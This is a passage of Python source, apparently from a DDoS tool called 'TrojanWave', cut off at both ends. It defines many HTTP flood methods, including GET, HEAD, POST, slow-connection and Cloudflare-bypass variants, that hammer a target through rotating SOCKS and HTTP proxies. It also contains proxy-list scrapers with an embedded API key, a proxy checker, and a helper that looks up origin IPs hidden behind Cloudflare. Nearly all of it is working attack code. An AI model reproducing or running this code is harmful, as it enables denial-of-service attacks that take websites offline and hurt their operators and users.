int(proxy[1])) 473 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 474 | s.connect((str(target), int(port))) 475 | if protocol == "https": 476 | ctx = ssl.SSLContext() 477 | s = ctx.wrap_socket(s, server_hostname=target) 478 | try: 479 | for _ in range(multiple): 480 | s.send(str.encode(request)) 481 | except: 482 | s.close() 483 | except: 484 | s.close() 485 | 486 | def capb(event, socks_type): 487 | header = Headers("get") 488 | proxy = Choice(proxies).strip().split(":") 489 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 490 | request = get_host + header 491 | event.wait() 492 | while time.time() < timer: 493 | try: 494 | s = socks.socksocket() 495 | if socks_type == 4: 496 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 497 | if socks_type == 5: 498 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 499 | if socks_type == 1: 500 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 501 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 502 | s.connect((str(target), int(port))) 503 | if protocol == "https": 504 | ctx = ssl.SSLContext() 505 | s = ctx.wrap_socket(s, server_hostname=target) 506 | try: 507 | for _ in range(multiple): 508 | s.send(str.encode(request)) 509 | except: 510 | s.close() 511 | except: 512 | s.close() 513 | 514 | def ovh(event, socks_type): 515 | header = Headers("ovh") 516 | proxy = Choice(proxies).strip().split(":") 517 | get_host = "HEAD " + path + "/" + str(Intn(1111111111, 9999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n" 518 | request = get_host + header 519 | event.wait() 520 | while time.time() < timer: 521 | try: 522 | s = socks.socksocket() 523 | if socks_type == 4: 524 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 525 | if socks_type == 5: 526 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 527 | if socks_type == 1: 528 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 529 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 530 | s.connect((str(target), int(port))) 531 | if protocol == "https": 532 | ctx = ssl.SSLContext() 533 | s = ctx.wrap_socket(s, server_hostname=target) 534 | try: 535 | for _ in range(multiple): 536 | s.send(str.encode(request)) 537 | except: 538 | s.close() 539 | except: 540 | s.close() 541 | 542 | 543 | def pps(event, socks_type): 544 | proxy = Choice(proxies).strip().split(":") 545 | request = Headers("pps") 546 | event.wait() 547 | while time.time() < timer: 548 | try: 549 | s = socks.socksocket() 550 | if socks_type == 4: 551 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 552 | if socks_type == 5: 553 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 554 | if socks_type == 1: 555 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 556 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 557 | s.connect((str(target), int(port))) 558 | if protocol == "https": 559 | ctx = ssl.SSLContext() 560 | s = ctx.wrap_socket(s, server_hostname=target) 561 | try: 562 | for _ in range(multiple): 563 | s.send(str.encode(request)) 564 | except: 565 | s.close() 566 | except: 567 | s.close() 568 | 569 | 570 | def even(event, socks_type): 571 | global proxy 572 | proxy = Choice(proxies).strip().split(":") 573 | header = Headers("even") 574 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 575 | request = get_host + header 576 | event.wait() 577 | while time.time() < timer: 578 | try: 579 | s = socks.socksocket() 580 | if socks_type == 4: 581 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 582 | if socks_type == 5: 583 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 584 | if socks_type == 1: 585 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 586 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 587 | s.connect((str(target), int(port))) 588 | if protocol == "https": 589 | ctx = ssl.SSLContext() 590 | s = ctx.wrap_socket(s, server_hostname=target) 591 | try: 592 | for _ in range(multiple): 593 | s.send(str.encode(request)) 594 | except: 595 | s.close() 596 | except: 597 | s.close() 598 | 599 | 600 | def brust(event, socks_type): 601 | global proxy 602 | proxy = Choice(proxies).strip().split(":") 603 | header = Headers("brust") 604 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 605 | request = get_host + header 606 | event.wait() 607 | while time.time() < timer: 608 | try: 609 | s = socks.socksocket() 610 | if socks_type == 4: 611 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 612 | if socks_type == 5: 613 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 614 | if socks_type == 1: 615 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 616 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 617 | s.connect((str(target), int(port))) 618 | if protocol == "https": 619 | ctx = ssl.SSLContext() 620 | s = ctx.wrap_socket(s, server_hostname=target) 621 | try: 622 | for _ in range(multiple): 623 | s.send(str.encode(request)) 624 | except: 625 | s.close() 626 | except: 627 | s.close() 628 | 629 | 630 | def cookie(event, socks_type): 631 | proxy = Choice(proxies).strip().split(":") 632 | header = Headers("cookie") 633 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 634 | request = get_host + header 635 | event.wait() 636 | while time.time() < timer: 637 | try: 638 | s = socks.socksocket() 639 | if socks_type == 4: 640 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 641 | if socks_type == 5: 642 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 643 | if socks_type == 1: 644 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 645 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 646 | s.connect((str(target), int(port))) 647 | if protocol == "https": 648 | ctx = ssl.SSLContext() 649 | s = ctx.wrap_socket(s, server_hostname=target) 650 | try: 651 | for _ in range(multiple): 652 | s.send(str.encode(request)) 653 | except: 654 | s.close() 655 | except: 656 | s.close() 657 | 658 | 659 | def cfb(event, socks_type): 660 | header = Headers("get") 661 | proxy = Choice(proxies).strip().split(":") 662 | get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n" 663 | request = get_host + header 664 | event.wait() 665 | while time.time() < timer: 666 | try: 667 | s = socks.socksocket() 668 | if socks_type == 4: 669 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 670 | if socks_type == 5: 671 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 672 | if socks_type == 1: 673 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 674 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 675 | s.connect((str(target), int(port))) 676 | if protocol == "https": 677 | ctx = ssl.SSLContext() 678 | s = ctx.wrap_socket(s, server_hostname=target) 679 | cfscrape.create_scraper(sess=s) 680 | try: 681 | for _ in range(multiple): 682 | s.sendall(str.encode(request)) 683 | except: 684 | s.close() 685 | except: 686 | s.close() 687 | 688 | 689 | # def tor(event, socks_type): 690 | # event.wait() 691 | # while time.time() < timer: 692 | # with tor_requests_session() as s: 693 | # s.get(sys.argv[2]) 694 | 695 | 696 | def AVB(event, socks_type): 697 | proxy = Choice(proxies).strip().split(":") 698 | event.wait() 699 | payload = str(random._urandom(64)) 700 | while time.time() < timer: 701 | try: 702 | s = cfscrape.create_scraper() 703 | if socks_type == 5 or socks_type == 4: 704 | s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 705 | s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 706 | if socks_type == 1: 707 | s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1]) 708 | s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1]) 709 | if protocol == "https": 710 | s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" 711 | try: 712 | for _ in range(multiple): 713 | s.post(sys.argv[2], timeout=1, data=payload) 714 | except: 715 | s.close() 716 | except: 717 | s.close() 718 | 719 | 720 | def bypass(event, socks_type): 721 | proxy = Choice(proxies).strip().split(":") 722 | event.wait() 723 | payload = str(random._urandom(64)) 724 | while time.time() < timer: 725 | try: 726 | s = requests.Session() 727 | if socks_type == 5 or socks_type == 4: 728 | s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 729 | s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 730 | if socks_type == 1: 731 | s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1]) 732 | s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1]) 733 | if protocol == "https": 734 | s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" 735 | try: 736 | for _ in range(multiple): 737 | s.post(sys.argv[2], timeout=1, data=payload) 738 | except: 739 | s.close() 740 | except: 741 | s.close() 742 | 743 | 744 | def dgb(event, socks_type): 745 | proxy = Choice(proxies).strip().split(":") 746 | event.wait() 747 | while time.time() < timer: 748 | try: 749 | s = cfscrape.create_scraper() 750 | if socks_type == 5 or socks_type == 4: 751 | s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 752 | s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 753 | if socks_type == 1: 754 | s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1]) 755 | s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1]) 756 | if protocol == "https": 757 | s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" 758 | try: 759 | sleep(5) 760 | for _ in range(multiple): 761 | s.get(sys.argv[2]) 762 | except: 763 | s.close() 764 | except: 765 | s.close() 766 | 767 | 768 | def head(event, socks_type): 769 | proxy = Choice(proxies).strip().split(":") 770 | header = Headers("head") 771 | head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n" 772 | request = head_host + header 773 | event.wait() 774 | while time.time() < timer: 775 | try: 776 | s = socks.socksocket() 777 | if socks_type == 4: 778 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 779 | if socks_type == 5: 780 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 781 | if socks_type == 1: 782 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 783 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 784 | s.connect((str(target), int(port))) 785 | if protocol == "https": 786 | ctx = ssl.SSLContext() 787 | s = ctx.wrap_socket(s, server_hostname=target) 788 | try: 789 | for _ in range(multiple): 790 | s.send(str.encode(request)) 791 | except: 792 | s.close() 793 | except: 794 | s.close() 795 | 796 | 797 | def null(event, socks_type): 798 | proxy = Choice(proxies).strip().split(":") 799 | header = Headers("null") 800 | head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n" 801 | request = head_host + header 802 | event.wait() 803 | while time.time() < timer: 804 | try: 805 | s = socks.socksocket() 806 | if socks_type == 4: 807 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 808 | if socks_type == 5: 809 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 810 | if socks_type == 1: 811 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 812 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 813 | s.connect((str(target), int(port))) 814 | if protocol == "https": 815 | ctx = ssl.SSLContext() 816 | s = ctx.wrap_socket(s, server_hostname=target) 817 | try: 818 | for _ in range(multiple): 819 | s.send(str.encode(request)) 820 | except: 821 | s.close() 822 | except: 823 | s.close() 824 | 825 | 826 | def gsb(event, socks_type): 827 | proxy = Choice(proxies).strip().split(":") 828 | header = Headers("head") 829 | head_host = "HEAD " + path + "?q=" + str(Intn(000000000, 999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n" 830 | request = head_host + header 831 | event.wait() 832 | while time.time() < timer: 833 | try: 834 | s = socks.socksocket() 835 | if socks_type == 4: 836 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 837 | if socks_type == 5: 838 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 839 | if socks_type == 1: 840 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 841 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 842 | s.connect((str(target), int(port))) 843 | if protocol == "https": 844 | ctx = ssl.SSLContext() 845 | s = ctx.wrap_socket(s, server_hostname=target) 846 | try: 847 | sleep(5) 848 | for _ in range(multiple): 849 | s.send(str.encode(request)) 850 | except: 851 | s.close() 852 | except: 853 | s.close() 854 | 855 | 856 | def hit(event, timer): 857 | global s 858 | request = Headers("hit") 859 | event.wait() 860 | while time.time() < timer: 861 | try: 862 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 863 | s.connect((str(target), int(port))) 864 | try: 865 | for _ in range(multiple): 866 | s.sendall(str.encode(request)) 867 | except: 868 | s.close() 869 | except: 870 | s.close() 871 | 872 | 873 | def cfbc(event, socks_type): 874 | request = Headers("cfb") 875 | event.wait() 876 | while time.time() < timer: 877 | try: 878 | s = socks.socksocket() 879 | if socks_type == 4: 880 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 881 | if socks_type == 5: 882 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 883 | if socks_type == 1: 884 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 885 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 886 | s.connect((str(target), int(port))) 887 | if protocol == "https": 888 | ctx = ssl.SSLContext() 889 | s = ctx.wrap_socket(s, server_hostname=target) 890 | try: 891 | for _ in range(multiple): 892 | s.sendall(str.encode(request)) 893 | except: 894 | s.close() 895 | except: 896 | s.close() 897 | 898 | 899 | def post(event, socks_type): 900 | request = Headers("post") 901 | proxy = Choice(proxies).strip().split(":") 902 | event.wait() 903 | while time.time() < timer: 904 | try: 905 | s = socks.socksocket() 906 | if socks_type == 4: 907 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 908 | if socks_type == 5: 909 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 910 | if socks_type == 1: 911 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 912 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 913 | s.connect((str(target), int(port))) 914 | if protocol == "https": 915 | ctx = ssl.SSLContext() 916 | s = ctx.wrap_socket(s, server_hostname=target) 917 | try: 918 | for _ in range(multiple): 919 | s.sendall(str.encode(request)) 920 | except: 921 | s.close() 922 | except: 923 | s.close() 924 | 925 | 926 | def stress(event, socks_type): 927 | request = Headers("stress") 928 | proxy = Choice(proxies).strip().split(":") 929 | event.wait() 930 | while time.time() < timer: 931 | try: 932 | s = socks.socksocket() 933 | if socks_type == 4: 934 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 935 | if socks_type == 5: 936 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 937 | if socks_type == 1: 938 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 939 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 940 | s.connect((str(target), int(port))) 941 | if protocol == "https": 942 | ctx = ssl.SSLContext() 943 | s = ctx.wrap_socket(s, server_hostname=target) 944 | try: 945 | for _ in range(multiple): 946 | s.sendall(str.encode(request)) 947 | except: 948 | s.close() 949 | except: 950 | s.close() 951 | 952 | 953 | def ostress(event, timer): 954 | request = Headers("stress") 955 | event.wait() 956 | while time.time() < timer: 957 | try: 958 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 959 | s.connect((str(target), int(port))) 960 | try: 961 | for _ in range(multiple): 962 | s.sendall(str.encode(request)) 963 | except: 964 | s.close() 965 | except: 966 | s.close() 967 | 968 | 969 | socket_list = [] 970 | t = 0 971 | 972 | def slow(conn, socks_type): 973 | global t 974 | proxy = Choice(proxies).strip().split(":") 975 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 976 | header = Headers("get") 977 | request = get_host + header 978 | while time.time() < timer: 979 | try: 980 | s = socks.socksocket() 981 | if socks_type == 4: 982 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 983 | if socks_type == 5: 984 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 985 | if socks_type == 1: 986 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 987 | s.connect((str(target), int(port))) 988 | if protocol == "https": 989 | ctx = ssl.SSLContext() 990 | s = ctx.wrap_socket(s, server_hostname=target) 991 | for _ in range(conn): 992 | try: 993 | s.send(request) * conn 994 | t += 1 995 | sys.stdout.write("Connections = " + t + "\r") 996 | sys.stdout.flush() 997 | except: 998 | s.close() 999 | proxy = Choice(proxies).strip().split(":") 1000 | except: 1001 | s.close() 1002 | proxy = Choice(proxies).strip().split(":") 1003 | 1004 | 1005 | def checking(lines, socks_type, ms): 1006 | global nums, proxies 1007 | proxy = lines.strip().split(":") 1008 | if len(proxy) != 2: 1009 | proxies.remove(lines) 1010 | return 1011 | err = 0 1012 | while True: 1013 | if err == 3: 1014 | proxies.remove(lines) 1015 | break 1016 | try: 1017 | s = socks.socksocket() 1018 | if socks_type == 4: 1019 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 1020 | if socks_type == 5: 1021 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 1022 | if socks_type == 1: 1023 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 1024 | s.settimeout(ms) 1025 | s.connect((str(target), int(port))) 1026 | if protocol == "https": 1027 | ctx = ssl.SSLContext() 1028 | s = ctx.wrap_socket(s, server_hostname=target) 1029 | s.send(str.encode("GET / HTTP/1.1\r\n\r\n")) 1030 | s.close() 1031 | break 1032 | except: 1033 | err += 1 1034 | nums += 1 1035 | 1036 | 1037 | nums = 0 1038 | 1039 | 1040 | def check_socks(ms): 1041 | global nums 1042 | thread_list = [] 1043 | for lines in list(proxies): 1044 | if choice == "5": 1045 | th = threading.Thread(target=checking, args=(lines, 5, ms,)) 1046 | th.start() 1047 | if choice == "4": 1048 | th = threading.Thread(target=checking, args=(lines, 4, ms,)) 1049 | th.start() 1050 | if choice == "1": 1051 | th = threading.Thread(target=checking, args=(lines, 1, ms,)) 1052 | th.start() 1053 | thread_list.append(th) 1054 | sleep(0.01) 1055 | for th in list(thread_list): 1056 | th.join() 1057 | ans = "y" 1058 | if ans == "y" or ans == "": 1059 | if choice == "4": 1060 | with open(out_file, 'wb') as fp: 1061 | for lines in list(proxies): 1062 | fp.write(bytes(lines, encoding='utf8')) 1063 | fp.close() 1064 | elif choice == "5": 1065 | with open(out_file, 'wb') as fp: 1066 | for lines in list(proxies): 1067 | fp.write(bytes(lines, encoding='utf8')) 1068 | fp.close() 1069 | elif choice == "1": 1070 | with open(out_file, 'wb') as fp: 1071 | for lines in list(proxies): 1072 | fp.write(bytes(lines, encoding='utf8')) 1073 | fp.close() 1074 | 1075 | 1076 | def check_list(socks_file): 1077 | temp = open(socks_file).readlines() 1078 | temp_list = [] 1079 | for i in temp: 1080 | if i not in temp_list: 1081 | if ':' in i: 1082 | temp_list.append(i) 1083 | rfile = open(socks_file, "wb") 1084 | for i in list(temp_list): 1085 | rfile.write(bytes(i, encoding='utf-8')) 1086 | rfile.close() 1087 | 1088 | 1089 | def downloadsocks(choice): 1090 | global out_file 1091 | if choice == "4": 1092 | f = open(out_file, 'wb') 1093 | try: 1094 | r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all", 1095 | timeout=5) 1096 | f.write(r.content) 1097 | except: 1098 | pass 1099 | try: 1100 | r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4", timeout=5) 1101 | f.write(r.content) 1102 | except: 1103 | pass 1104 | try: 1105 | r = requests.get("https://www.proxyscan.io/download?type=socks4", timeout=5) 1106 | f.write(r.content) 1107 | except: 1108 | pass 1109 | try: 1110 | r = requests.get( 1111 | "https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=socks4&lastchecked=60", 1112 | timeout=5) 1113 | f.write(r.content) 1114 | except: 1115 | pass 1116 | try: 1117 | r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt", timeout=5) 1118 | f.write(r.content) 1119 | f.close() 1120 | except: 1121 | f.close() 1122 | try: 1123 | 1124 | req = requests.get("https://www.socks-proxy.net/", timeout=5, headers={"User-Agent", UserAgent}).text 1125 | part = str(req) 1126 | part = part.split("") 1127 | part = part[1].split("") 1128 | part = part[0].split("") 1129 | proxies = "" 1130 | for proxy in part: 1131 | proxy = proxy.split("") 1132 | try: 1133 | proxies = proxies + proxy[0] + ":" + proxy[1] + "\n" 1134 | except: 1135 | pass 1136 | out_file = open(out_file, "a") 1137 | out_file.write(proxies) 1138 | out_file.close() 1139 | except: 1140 | pass 1141 | if choice == "5": 1142 | f = open(out_file, 'wb') 1143 | try: 1144 | r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all", 1145 | timeout=5) 1146 | f.write(r.content) 1147 | except: 1148 | pass 1149 | try: 1150 | r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5", timeout=5) 1151 | f.write(r.content) 1152 | f.close() 1153 | except: 1154 | pass 1155 | try: 1156 | r = requests.get("http://amp.tsddos.cc/proxy1.txt", timeout=5) 1157 | f.write(r.content) 1158 | f.close() 1159 | except: 1160 | pass 1161 | try: 1162 | r = requests.get("https://www.proxyscan.io/download?type=socks5", timeout=5) 1163 | f.write(r.content) 1164 | f.close() 1165 | except: 1166 | pass 1167 | try: 1168 | r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt", timeout=5) 1169 | f.write(r.content) 1170 | except: 1171 | pass 1172 | try: 1173 | r = requests.get( 1174 | "https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=socks5&lastchecked=60", 1175 | timeout=5) 1176 | f.write(r.content) 1177 | except: 1178 | pass 1179 | try: 1180 | r = requests.get( 1181 | "https://gist.githubusercontent.com/Azuures/1e0cb7a1097c720b4ed2aa63acd82179/raw/97d2d6a11873ffa8ca763763f7a5dd4035bcf95f/fwefnwex", 1182 | timeout=5) 1183 | f.write(r.content) 1184 | f.close() 1185 | except: 1186 | f.close() 1187 | if choice == "1": 1188 | f = open(out_file, 'wb') 1189 | try: 1190 | r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=http&country=all", 1191 | timeout=5) 1192 | f.write(r.content) 1193 | except: 1194 | pass 1195 | try: 1196 | r = requests.get("https://www.proxy-list.download/api/v1/get?type=http", timeout=5) 1197 | f.write(r.content) 1198 | f.close() 1199 | except: 1200 | pass 1201 | try: 1202 | r = requests.get("https://www.proxyscan.io/download?type=http", timeout=5) 1203 | f.write(r.content) 1204 | f.close() 1205 | except: 1206 | pass 1207 | try: 1208 | r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt", timeout=5) 1209 | f.write(r.content) 1210 | except: 1211 | pass 1212 | try: 1213 | r = requests.get( 1214 | "https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=http&lastchecked=60", 1215 | timeout=5) 1216 | f.write(r.content) 1217 | f.close() 1218 | except: 1219 | f.close() 1220 | 1221 | 1222 | def main(): 1223 | global proxies, multiple, choice, timer, out_file 1224 | method = str(sys.argv[1]).lower() 1225 | 1226 | out_file = str("files/proxys/" + sys.argv[5]) 1227 | if not os.path.exists(out_file): 1228 | makefile(out_file) 1229 | 1230 | if method == "check": 1231 | proxydl(out_file, socks_type) 1232 | exit() 1233 | if method == "stop": 1234 | url = str(sys.argv[2]).strip() 1235 | UrlFixer(url) 1236 | stop() 1237 | elif (method == "help") or (method == "h"): 1238 | usge() 1239 | elif (method == "check"): 1240 | pass 1241 | elif str(method.upper()) not in str(methods): 1242 | print("method not found") 1243 | exit() 1244 | timer = int(time.time()) + int(sys.argv[7]) 1245 | url = str(sys.argv[2]).strip() 1246 | UrlFixer(url) 1247 | choice = str(sys.argv[3]).strip() 1248 | if choice != "4" and choice != "5" and choice != "1": 1249 | print("Socks Type Not Found [4, 5, 1]") 1250 | exit() 1251 | if choice == "4": 1252 | socks_type = 4 1253 | elif choice == "1": 1254 | socks_type = 1 1255 | else: 1256 | socks_type = 5 1257 | threads = int(sys.argv[4]) 1258 | proxies = open(out_file).readlines() 1259 | if method == "slow": 1260 | conn = threads 1261 | proxydl(out_file, socks_type) 1262 | print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ".format(method, target, port, sys.argv[7],len(proxies), str(nums))) 1263 | 1264 | for _ in range(conn): 1265 | threading.Thread(target=slow, args=(conn, socks_type), daemon=True).start() 1266 | else: 1267 | multiple = str((sys.argv[6])) 1268 | if multiple == "": 1269 | multiple = int(100) 1270 | else: 1271 | multiple = int(multiple) 1272 | event = threading.Event() 1273 | start_attack(method, threads, event, socks_type) 1274 | event.clear() 1275 | event.set() 1276 | while True: 1277 | try: 1278 | sleep(0.1) 1279 | except KeyboardInterrupt: 1280 | break 1281 | 1282 | 1283 | def proxydl(out_file, socks_type): 1284 | global proxies, multiple, choice, data 1285 | ms = 1 1286 | if socks_type == 1: 1287 | socktyper = "HTTP" 1288 | if socks_type == 4: 1289 | socktyper = "SOCKS4" 1290 | if socks_type == 5: 1291 | socktyper = "SOCKS5" 1292 | 1293 | print("downloading {}'s proxy plz wait".format(socktyper)) 1294 | downloadsocks(choice) 1295 | proxies = open(str(out_file)).readlines() 1296 | check_list(out_file) 1297 | check_socks(ms) 1298 | 1299 | 1300 | bds = 0 1301 | 1302 | 1303 | # layer tool :|||||||||||| 1304 | def toolgui(): 1305 | global bds 1306 | tos = str(to).replace("'", "").replace("[", "").replace("]", "").replace(",", "\n") 1307 | if bds == 0: 1308 | print(''' 1309 | Tools: 1310 | ''' + tos+ ''' 1311 | Other: 1312 | Clear 1313 | Exit 1314 | ''') 1315 | bds = 1 1316 | tool = input(socket.gethostname() + "@"+name+":~# ").lower() 1317 | if tool != "e" and (tool != "exit") and (tool != "q") and (tool != "quit") and (tool != "logout") and ( 1318 | tool != "close"): 1319 | pass 1320 | else: 1321 | exit() 1322 | if tool == "cfip": 1323 | domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ') 1324 | cfip(domain) 1325 | return tools() 1326 | elif tool == "dstat": 1327 | print(tool + ": command ready") 1328 | return tools() 1329 | elif tool == "dns": 1330 | return tools() 1331 | elif tool == "check": 1332 | domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ') 1333 | check(domain) 1334 | return tools() 1335 | elif tool == "ping": 1336 | domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ') 1337 | piger(domain) 1338 | return tools() 1339 | elif tool == "info": 1340 | domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ') 1341 | piger(domain) 1342 | return tools() 1343 | elif (tool == "help") or (tool == "h") or (tool == "?"): 1344 | tos = str(to).replace("'", "").replace("[", "").replace("]", "").replace(",", "\n") 1345 | print(''' 1346 | Tools: 1347 | {tos} 1348 | Other: 1349 | Clear 1350 | Exit 1351 | ''') 1352 | return tools() 1353 | elif (tool == "cls") or (tool == 'clear') or (tool == 'c'): 1354 | print("\033[H\033[J") 1355 | return tools() 1356 | elif not tool: 1357 | return tools() 1358 | 1359 | elif " " in tool: 1360 | return tools() 1361 | elif " " in tool: 1362 | return tools() 1363 | elif " " in tool: 1364 | return tools() 1365 | elif "\n" in tool: 1366 | return tools() 1367 | elif "\r" in tool: 1368 | return tools() 1369 | 1370 | else: 1371 | print(tool + ": command not found") 1372 | return tools() 1373 | 1374 | 1375 | def tools(): 1376 | global domain, name 1377 | name = "TrojanWave" 1378 | try: 1379 | tool = sys.argv[2].lower() 1380 | if tool != "dstat": 1381 | domain = sys.argv[3] 1382 | if str('.') not in str(domain): 1383 | print('address not found') 1384 | toolgui() 1385 | if tool == "cfip": 1386 | cfip(domain) 1387 | elif tool == "dns": 1388 | print(tool + ": comming soon !") 1389 | elif tool == "check": 1390 | check(domain) 1391 | elif tool == "ping": 1392 | piger(domain) 1393 | elif tool == "dstat": 1394 | address = requests.get('http://ipinfo.io/ip', headers={"User-Agent": UserAgent, }).text 1395 | print('now please attack to {address}') 1396 | os.system('dstat') 1397 | else: 1398 | print('tool not found') 1399 | toolgui() 1400 | except IndexError: 1401 | toolgui() 1402 | 1403 | 1404 | def cfip(domain): 1405 | if str("http") in str(domain): 1406 | domain = domain.replace('https://', '').replace('http:', '').replace('/') 1407 | URL = "http://www.crimeflare.org:82/cgi-bin/cfsearch.cgi" 1408 | r = requests.post(URL, data={"cfS": {domain}}, headers={"User-Agent": UserAgent, }, timeout=1) 1409 